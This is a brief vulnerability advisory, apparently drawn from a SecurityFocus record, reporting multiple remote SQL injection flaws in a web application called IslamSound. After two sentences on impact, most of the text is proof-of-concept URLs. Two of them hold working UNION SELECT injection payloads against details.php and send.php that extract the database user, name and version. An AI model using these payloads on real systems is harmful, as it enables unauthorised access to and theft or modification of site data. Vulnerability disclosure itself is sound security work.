source: https://www.securityfocus.com/bid/39880/info
IslamSound is prone to multiple remote SQL injection vulnerabilities.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/sound.php?catid=2 sql
http://www.example.com/details.php?linkid=-7 union select user(),1,2,database(),version(),5,6,7,8--
http://www.example.com/send.php?linkid=-5 union select user(),1,2,3,4,5,6,7,8--